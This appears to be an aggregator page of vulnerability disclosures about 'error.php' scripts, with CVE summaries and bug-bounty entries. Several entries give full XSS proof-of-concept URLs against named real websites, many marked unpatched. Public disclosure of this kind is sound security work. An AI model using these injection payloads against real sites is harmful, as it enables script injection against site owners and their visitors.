CVE-2019-14471

CVE-2019-14471 affects TestLink 1.9.19 and is a cross-site scripting (XSS) vulnerability via the error.php message parameter. Public data in the connected documents confirms the affected software/version and the root cause as improper handling of the error message leading to script injection. CVS...

CVE-2019-14471

TestLink 1.9.19 has XSS via the error.php message parameter...

CVE-2018-19189

The Amazon PAYFORT payfort-php-SDK payment gateway SDK through 2018-04-26 has XSS via an arbitrary parameter name or value that is mishandled in an error.php echo statement...

CVE-2018-19190

The Amazon PAYFORT payfort-php-SDK payment gateway SDK through 2018-04-26 has XSS via the error.php errormsg parameter...

drfrostmaths.com XSS vulnerability

Open Bug Bounty ID: OBB-650561 Description| Value ---|--- Affected Website:| drfrostmaths.com Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1...

CVE-2018-7776

The vulnerability exists within error.php in Schneider Electric U.motion Builder software versions prior to v1.3.4. System information is returned to the attacker that contains sensitive data...

CVE-2018-7776

The vulnerability exists within error.php in Schneider Electric U.motion Builder software versions prior to v1.3.4. System information is returned to the attacker that contains sensitive data...

Design/Logic Flaw

The vulnerability exists within error.php in Schneider Electric U.motion Builder software versions prior to v1.3.4. System information is returned to the attacker that contains sensitive data...

CVE-2018-10307

ILIAS LMS vulnerability CVE-2018-10307 affects ILIAS 5.2.x through 5.3.x before 5.3.4. The issue is an XSS in error.php triggered by the text of a PDO exception, allowing injection of arbitrary web script/HTML. Impact is user-exposed XSS; exploitation details are not provided beyond the injection...

udllibros.com XSS vulnerability

Open Bug Bounty ID: OBB-607395 Description| Value ---|--- Affected Website:| udllibros.com Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1...

CVE-2018-7251

An issue was discovered in config/error.php in Anchor 0.12.3. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error such as "Too many connections" has occurred...

lidiza.com XSS vulnerability

Vulnerable URL: http://www.lidiza.com/html2012/error.php?titulo=SEGURIDAD=Necesitas+autentificarte+como+cliente+para+poder+acceder+a+esta+p%E1gina%22%3E%3Csvg/onload=prompt/openbugbounty/%3E28/openbug%20bounty/%3E&noAJAX=S Details: Description| Value ---|--- Patched:| No Latest check for patch:|...

transpagos.net XSS vulnerability

Vulnerable URL: http://www.transpagos.net/prepagotp/error.php?mensaje=No+hay+sesion+previa%22%3E%3Csvg/onload=prompt/openbugbounty/%3E28/openbug%20bounty/%3E=12=si Details: Description| Value ---|--- Patched:| No Latest check for patch:| 27.07.2017 Vulnerability type:| XSS Vulnerability status:|...

globalechosting.com XSS vulnerability

Vulnerable URL: http://www.globalechosting.com/validator/error.php?message=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E Details: Description| Value ---|--- Patched:| No Latest check for patch:| 26.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / No...

weethet.nl XSS vulnerability

Vulnerable URL: http://www.weethet.nl/error.php?error=404=javascript:alert%28/XSSPOSED/%29 Details: Description| Value ---|--- Patched:| No Latest check for patch:| 30.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 825674 Google Pagerank| 0 VIP website...

foxtale.be XSS vulnerability

Vulnerable URL: http://www.foxtale.be/site/error.php?url=http%3A%2F%2Fwww.foxtale.be%2Fen%2Finnovation-14.htm=--!"...

quaestor.be XSS vulnerability

Vulnerable URL: http://www.quaestor.be/site/error.php?url=http%3A%2F%2Fwww.quaestor.be%2Fnl%2Frentmeesters-5.htm=--!%3E%22%3E%3C/script%20%3E%3Ciframe/onload=alert%28/XSSPOSED/%29%3E Details: Description| Value ---|--- Patched:| No Latest check for patch:| 25.07.2017 Vulnerability type:| XSS...

lvfashion.be XSS vulnerability

Vulnerable URL: http://www.lvfashion.be/site/error.php?url=http%3A%2F%2Fwww.lvfashion.be%2F=--!%3E%22%3E%3C/script%20%3E%3Ciframe/onload=alert%28/XSSPOSED/%29%3E Details: Description| Value ---|--- Patched:| Yes, at 25.07.2017 Latest check for patch:| 25.07.2017 20:06 GMT Vulnerability type:| XSS...

pinocchio1.be XSS vulnerability

Vulnerable URL: http://www.pinocchio1.be/site/error.php?url=http%3A%2F%2Fwww.pinocchio1.be%2Fnl%2Fhome-1.htm=--!%3E%22%3E%3C/script%20%3E%3Ciframe/onload=alert%28/XSSPOSED/%29%3E Details: Description| Value ---|--- Patched:| No Latest check for patch:| 25.07.2017 Vulnerability type:| XSS...

compaktuna.be XSS vulnerability

Vulnerable URL: http://www.compaktuna.be/site/error.php?url=http%3A%2F%2Fwww.compaktuna.be%2Ffr%2Fplaspactuna-125.htm=--!%3E%22%3E%3C/script%20%3E%3Ciframe/onload=alert%28/XSSPOSED/%29%3E Details: Description| Value ---|--- Patched:| No Latest check for patch:| 25.07.2017 Vulnerability type:| XSS...